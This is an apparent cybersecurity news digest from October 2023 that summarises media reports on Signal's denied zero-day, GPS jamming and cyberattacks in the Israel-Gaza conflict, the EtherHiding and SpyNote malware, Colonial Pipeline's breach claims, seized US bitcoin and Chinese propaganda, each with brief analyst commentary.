Daily Drop (626): Signal: 0-Day Debunked, Israel-Hamas: GPS Jamming, EtherHiding, Colonial Pipeline, US GOV: Seized Crypto, Israel-Gaza: Cyberattacks, Canon's Quantum Leap, или рашке конец?
10-16-23
Monday, Oct 16, 2023 // (IG): BB // Может ли Китай вытащить Путина
Signal Stands Firm: Debunks Alleged Zero-Day Vulnerability Reports
Bottom Line Up Front (BLUF): Signal, the encrypted messaging app, refutes claims of a zero-day vulnerability in its software. The company's investigation found no evidence to support the alleged flaw, and it received no valid information from official reporting channels or the U.S. government. This development highlights the ongoing challenges in securing messaging apps.
Analyst Comments: Amnesty International recently reported that spyware attacks have targeted journalists, politicians, and academics across regions like the European Union, the U.S., and Asia. These attacks aim to deploy spyware such as Predator, developed by the Intellexa alliance, through deceptive tactics on social media platforms like Twitter and Facebook. Predator spyware enables the surveillance of infected devices, including access to sensitive data like photos, location information, chat messages, and microphone recordings. The spread of this malware is facilitated by Intellexa's "Cyber Operation Platform." Additionally, commercial surveillance vendors are exploring unconventional methods, such as weaponizing digital advertising, to infect mobile devices worldwide via ad networks.
FROM THE MEDIA: Signal, a renowned encrypted messaging app, has firmly denied the existence of a zero-day vulnerability in its software. Despite viral reports suggesting a security flaw that could provide complete access to mobile devices, Signal's responsible investigation found no evidence to substantiate these claims. Notably, the company also sought verification from the U.S. government, which similarly had no information to validate the alleged vulnerability. In response to this incident, Signal has encouraged individuals with credible information to report such findings to security@signal[.]org. As a precautionary measure, users have been advised to disable link previews within the app's settings, thereby reducing potential risks associated with the alleged vulnerability. This revelation comes at a time when the market for zero-day vulnerabilities in messaging apps, including WhatsApp, is thriving, with prices ranging from $1.7 to $8 million. Nation-state threat actors often exploit such flaws to gain access to targeted devices, enabling remote code execution and covert surveillance.
READ THE STORY: THN
Surge in GPS Jamming Amid Israel-Hamas Conflict Raises Civilian Concerns
Bottom Line Up Front (BLUF): The ongoing conflict between Israel and Hamas has witnessed a surge in GPS jamming activities, driven primarily by Hamas's efforts to disrupt Israeli communication systems. This development underscores the growing role of jamming GPS and communication networks in modern warfare, affecting not only military precision but also civilian applications, including commercial flights. With airlines reducing services and regulatory bodies advising caution in the region's airspace, the repercussions of this conflict extend far beyond the battlefield, emphasizing the urgent need for security assessments and alternative positioning, navigation, and timing (PNT) systems to safeguard civilian interests.
Analyst Comments: The ongoing conflict between Israel and Hamas has witnessed a pronounced increase in GPS jamming activities, with Hamas actively targeting Israeli communication systems. This development underscores the growing role of GPS and communication networks in modern warfare scenarios, where precision and coordination are paramount. PNT services play a pivotal role not only in military operations but also in various civilian applications, making them a prime target in conflicts. The Middle East, known for its susceptibility to jamming and spoofing, now faces disruptions that extend beyond security concerns. These disruptions have resulted in regional instability and have even impacted commercial aviation. Regulatory bodies, including the Federal Aviation Administration and the European Union Aviation Safety Agency, have issued advisories to airlines operating in the region, leading to flight cancellations and suspensions.
FROM THE MEDIA: During the Israel-Hamas conflict, a significant uptick in GPS interference has occurred due to Hamas's jamming of Israeli communication systems. This highlights the significance of PNT services in modern warfare and the critical need for precision and coordination. Such services are essential for military operations and civilian applications. Recent disruptions in the Middle East, including alleged Russian interference in Syria, have prompted cautionary measures by aviation authorities, impacting commercial flights in the region. This escalation extends implications far beyond the battlefield.
READ THE STORY: Haaretz // GPS World
Canon's Quantum Leap: Can Nanoimprint Lithography Challenge ASML's Dominance
Bottom Line Up Front (BLUF): Canon's announcement of nano imprint lithography capable of 5nm chip production has the potential to disrupt ASML's market dominance. However, skepticism lingers regarding the technology's readiness and practicality, while export control considerations add another layer of complexity.
Analyst Comments: The practicality and commercial impact of NIL are expected to take at least five years to materialize, with initial adoption likely focused on memory chips. Transitioning to high-volume execution and manufacturing readiness remains a significant hurdle. Nonetheless, the potential disruption of chip manufacturing warrants attention. Organizations in the semiconductor industry should closely monitor developments in NIL, prepare for potential shifts in the market, and consider the implications of export controls in a rapidly evolving landscape. The competition between Canon and ASML may ultimately reshape the semiconductor manufacturing landscape, but it is a transformation that will unfold over several years, not months.
FROM THE MEDIA: In the realm of advanced chip manufacturing, Dutch giant ASML has been the uncontested leader for years. Yet, Canon, primarily known for high-end camera systems, recently introduced nano imprint lithography (NIL) technology, claiming the capability to produce 5nm chips, with potential refinement down to 2nm. This places Canon in direct competition with ASML's extreme ultraviolet lithography (EUV) technology, the exclusive choice for sub-7nm chip manufacturing. Canon's NIL technology offers a unique advantage as it does not rely on complex optics or mirrors used in EUV, potentially bypassing US restrictions on high-end chip making equipment exports to China. This is particularly significant given the US pressure on allies like Korea, Japan, and the Netherlands to limit such exports.
READ THE STORY: The Register
Binance's Smart Chain Exploited in New 'EtherHiding' Malware Campaign
Bottom Line Up Front (BLUF): A sophisticated malware campaign known as "EtherHiding" has emerged, leveraging Binance's Smart Chain (BSC) contracts to distribute malicious code. Guardio Labs identified this campaign, which has evolved into a highly resilient form of malware distribution. The attackers initially targeted WordPress sites, tricking visitors with fake browser update warnings that ultimately led to the deployment of information-stealing malware. Notably, the attackers have shifted to using BSC, benefiting from its decentralized and anonymous nature. Once infected, websites are injected with obfuscated JavaScript, creating a smart contract that queries the BNB Smart Chain to fetch a malicious payload from a command-and-control server. Victims are lured into downloading malicious executables from legitimate file hosting services.
Analyst Comments: The "EtherHiding" malware campaign represents a new level of sophistication in malware distribution. By exploiting Binance's Smart Chain, threat actors have created a resilient method of serving malicious code. This campaign's evolution involves compromising WordPress sites, a common target for attackers, by presenting fake browser updates to visitors. The use of obfuscated JavaScript and smart contracts on the BNB Smart Chain adds a layer of complexity, making it difficult to detect and disrupt the attack. Victims who unknowingly click on the fake update buttons are directed to download malicious files from legitimate hosting services. The decentralized nature of this approach, while advantageous for attackers, poses significant challenges for mitigation efforts. As such, it is essential for website owners to follow security best practices, including regular updates, user management, and robust passwords, to minimize the risk of falling victim to such attacks.
FROM THE MEDIA: A sophisticated malware campaign known as "EtherHiding" has emerged, leveraging Binance's Smart Chain (BSC) contracts to distribute malicious code. Guardio Labs identified this campaign, which has evolved into a highly resilient form of malware distribution. The attackers initially targeted WordPress sites, tricking visitors with fake browser update warnings that ultimately lead to the deployment of information-stealing malware. Notably, the attackers have shifted to using BSC, benefiting from its decentralized and anonymous nature. Once infected, websites are injected with obfuscated JavaScript, creating a smart contract that queries the BNB Smart Chain to fetch a malicious payload from a command-and-control server. Victims are lured into downloading malicious executables from legitimate file hosting services.
READ THE STORY: THN
Colonial Pipeline Dismisses Ransomware Claims as Unrelated Data Breach
Bottom Line Up Front (BLUF): Colonial Pipeline, the operator of the largest refined oil products pipeline system in the U.S., has refuted claims by the Ransomed.vc gang of a ransomware attack on their systems. The company confirmed that there has been no disruption to pipeline operations, and their systems remain secure. Colonial Pipeline attributes the incident to a third-party data breach, unrelated to their own operations, following an assessment by their security and technology teams in collaboration with CISA.
Analyst Comments: Colonial Pipeline, known for its extensive pipeline network for refined oil products in the United States, responded to claims made by the Ransomed.vc gang regarding a security incident. The gang had alleged that they successfully compromised Colonial Pipeline's systems and had stolen data. However, after thorough assessment by Colonial Pipeline's security and technology teams, in coordination with the Cybersecurity and Infrastructure Security Agency (CISA), the company confirmed that there has been no disruption to pipeline operations and that their systems are secure. The files shared by the gang were deemed to be part of a third-party data breach, unrelated to Colonial Pipeline's operations. Further details about the third party involved and the extent of the breach were not disclosed.
FROM THE MEDIA: Colonial Pipeline's swift response to the recent claims of a ransomware attack demonstrates the increased vigilance in the energy sector following the high-profile 2021 incident. The company's collaboration with CISA and its security and technology teams highlights the importance of coordinated responses to potential cyber threats. While the Ransomed.vc gang's claims may have caused concern, Colonial Pipeline's assessment suggests that the incident was unrelated to their systems and operations. This incident serves as a reminder of the ongoing threats faced by critical infrastructure organizations and the need for continuous cybersecurity measures to protect against potential disruptions.
READ THE STORY: The Record
SpyNote Android Trojan: A Stealthy Threat with Information-Gathering Capabilities
Bottom Line Up Front (BLUF): SpyNote, a notorious Android banking trojan, has been dissected to reveal its sophisticated information-gathering features. Spread through SMS phishing campaigns, this malware hides its presence on infected devices and leverages accessibility permissions to record audio, phone calls, keystrokes, and capture screenshots. Victims attempting to uninstall the malicious app are met with obstacles, highlighting the need for enhanced mobile security.
Analyst Comments: One of SpyNote's notable features is its exploitation of accessibility permissions, which it gains after launching via an external trigger. This access is then leveraged to acquire additional permissions for recording audio, phone calls, logging keystrokes, and capturing screenshots using the MediaProjection API. The malware further fortifies itself by implementing diehard services designed to resist termination attempts by both victims and the operating system.
FROM THE MEDIA: SpyNote, a well-known Android banking trojan, has once again raised concerns due to its intricate information-gathering capabilities. This malware is typically distributed through SMS phishing campaigns, luring potential victims into installing the malicious app via embedded links. What sets SpyNote apart is its ability to request invasive permissions, including access to call logs, camera, SMS messages, and external storage. Moreover, it employs stealthy tactics to avoid detection, such as concealing itself from the Android home screen and Recents screen. One of SpyNote's notable features is its exploitation of accessibility permissions, which it gains after launching via an external trigger. This access is then leveraged to acquire additional permissions for recording audio, phone calls, logging keystrokes, and capturing screenshots using the MediaProjection API. The malware further fortifies itself by implementing diehard services designed to resist termination attempts by both victims and the operating system.
READ THE STORY: THN
US Government Holds $5 Billion in Seized Bitcoin: Impact on Cryptocurrency Market and Legal Challenges
Bottom Line Up Front (BLUF): With over 200,000 BTC amassed from cybercriminal seizures, the US Government controls a staggering $5 billion worth of cryptocurrency. While a portion has been sold off, the government's cautious approach is driven by complex legal processes rather than profit motives, prompting scrutiny of cryptocurrency regulations and market dynamics.
Analyst Comments: The US government's accumulation of Bitcoin through cybercriminal seizures sheds light on the cryptocurrency's dual role as both a tool for illicit activities and a subject of government scrutiny. The government's decision not to exploit these assets for profit highlights its commitment to adhering to established legal procedures and due process. This complex situation underscores the importance of robust cybersecurity measures in the cryptocurrency realm to prevent theft and fraudulent activities. The substantial Bitcoin holdings controlled by the government also prompt discussions about the broader implications for cryptocurrency regulations and enforcement.
FROM THE MEDIA: In a significant development, the US government has found itself in possession of more than $5 billion worth of Bitcoin, the result of extensive seizures linked to cyber criminal activities. This sizable cryptocurrency reserve, comprising over 200,000 BTC, is under the purview of agencies such as the Justice Department and the IRS. Despite selling a portion, reports suggest that the actual holding may be larger than initially estimated. The cryptocurrency community is closely monitoring this situation, as any potential sale or movement of Bitcoin by the government could have a profound impact on the cryptocurrency market. It is important to note that the government's intention is not to generate profits from these assets, but rather to navigate lengthy legal processes, including court orders, for their management and potential liquidation. This development underscores the ongoing battle against cybercrime and raises questions about cryptocurrency regulations and enforcement.
READ THE STORY: CryptoTimes
Cyberattacks Escalate in Israel-Gaza Conflict as Hackers Sympathetic to Hamas Join the Fray
Bottom Line Up Front (BLUF): The Israel-Gaza conflict has seen an uptick in cyberattacks, as hackers sympathetic to Hamas attempt to make it a battleground for cyberwarfare. Hacking groups associated with Iran and Russia have launched various cyberattacks and online campaigns against Israel, aiming to augment the ongoing physical conflict. While the extent and effectiveness of these attacks remain unclear, they underscore the growing role of cyber operations in modern conflicts. The affiliations of these hacking groups may offer insights into potential state support for Hamas. Israel's advanced cybersecurity capabilities pose a significant challenge for cyber adversaries.
Analyst Comments: The use of cyberattacks in conjunction with traditional warfare is becoming a prominent feature of modern conflicts. While the immediate impact of these cyberattacks on Israel is limited, they demonstrate a shift in tactics and a growing awareness of the importance of cyber operations in warfare. The affiliations of hacking groups may indicate indirect state involvement, highlighting the complex dynamics of state-sponsored cyber operations. As the Israel-Gaza conflict continues, the cybersecurity landscape remains dynamic, with the potential for further cyber escalation. The ability to coordinate cyberattacks with physical actions presents new challenges for defense and intelligence agencies. It underscores the need for continued vigilance and investment in cybersecurity capabilities to safeguard critical infrastructure and national security.
FROM THE MEDIA: In recent weeks, hacking groups with links to countries such as Iran and Russia have initiated a series of cyberattacks and online campaigns against Israel amid the Israel-Gaza conflict. These cyberattacks coincide with the physical conflict and have targeted various Israeli entities, including government websites, the electric grid, a rocket alert app, and even the Iron Dome missile defense system. While the extent and impact of these cyberattacks remain uncertain, they demonstrate a concerted effort to combine digital tactics with traditional warfare, similar to how Russia employed cyberattacks alongside military actions in Ukraine. Liz Wu, a spokesperson for Israeli-based cybersecurity firm Check Point Software, reported that more than 40 hacking groups launched attacks, disrupting over 80 websites during the early days of the conflict. These attacks affected government and media websites. Given the low internet connectivity in Gaza and the ongoing Israeli actions, these cyberattacks are believed to originate from outside Gaza.
READ THE STORY: Politico
Items of interest
Sri Lanka Urges Unity to Counter Anti-China Propaganda Amid Belt and Road Initiative Discussions
Bottom Line Up Front (BLUF): Progressive forces in Sri Lanka have been urged to collaborate and launch a campaign aimed at countering anti-China propaganda disseminated by imperialist entities. This call comes during discussions on China's Belt and Road Initiative (BRI). Lanka Sama Samaja Party (LSSP) leader Prof. Tissa Vitharana emphasized that China's rise as a superpower has been achieved without resorting to imperialism, despite ongoing propaganda campaigns against it. He stressed the need for unity among progressive forces to debunk false claims and called on the government to address these allegations effectively.
Analyst Comments: Prof. Tissa Vitharana's call for unity against anti-China propaganda reflects the growing importance of information warfare and diplomacy in contemporary global politics. As Sri Lanka participates in discussions regarding China's Belt and Road Initiative, it is essential for stakeholders to address misinformation and ensure that accurate information is disseminated. The emphasis on transparent and productive use of borrowed funds aligns with responsible financial practices. Encouraging FTAs with major economies like China and India can be a strategic move to stimulate economic growth and cooperation. Overall, this discussion highlights the evolving dynamics of international relations in the context of infrastructure and economic development initiatives.
FROM THE MEDIA: During a recent discussion on the Belt and Road Initiative (BRI), Lanka Sama Samaja Party (LSSP) leader Prof. Tissa Vitharana urged progressive forces in Sri Lanka to join forces in combating anti-China propaganda. Organized by the Asia Progress Forum, which is affiliated with the Communist Party of Sri Lanka (CPSL), the event aimed to shed light on China's BRI and its potential benefits. Prof. Vitharana highlighted that despite baseless allegations and misinformation, China has emerged as a superpower without adopting imperialist strategies. He specifically mentioned the false narrative of a 'Chinese debt trap' and emphasized the importance of uniting to counter such disinformation. Additionally, he called on the government to take proactive steps to address and counterbalance these unfounded claims.
READ THE STORY: The Island
What the HELL is Year Hare Affair? (China's UNHINGED Propaganda Cartoon) (Video)
FROM THE MEDIA: Year Hare Affair (Chinese: 那年那兔那些事(儿); lit. 'Those stories of that rabbit that happened in those years') is a Chinese webcomic and media franchise by Lin Chao (林超), initially under the pen name "逆光飞行" (Pinyin: Nìguāng Fēixíng, lit. "flight against the light"). The comic uses anthropomorphic animals as an allegory for nations and sovereign states to represent 20th century political, military and diplomatic events.
Why Is Chinese Propaganda So Successful (Video)
FROM THE MEDIA: The Chinese Communist Party spends massively on its propaganda, and that's because it knows it gets good returns. In this episode of China Uncensored, we look at common tactics propagandists use to change your mind about China, what some of their talking points are, and Western media's role in portraying the CCP in a positive and false light.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.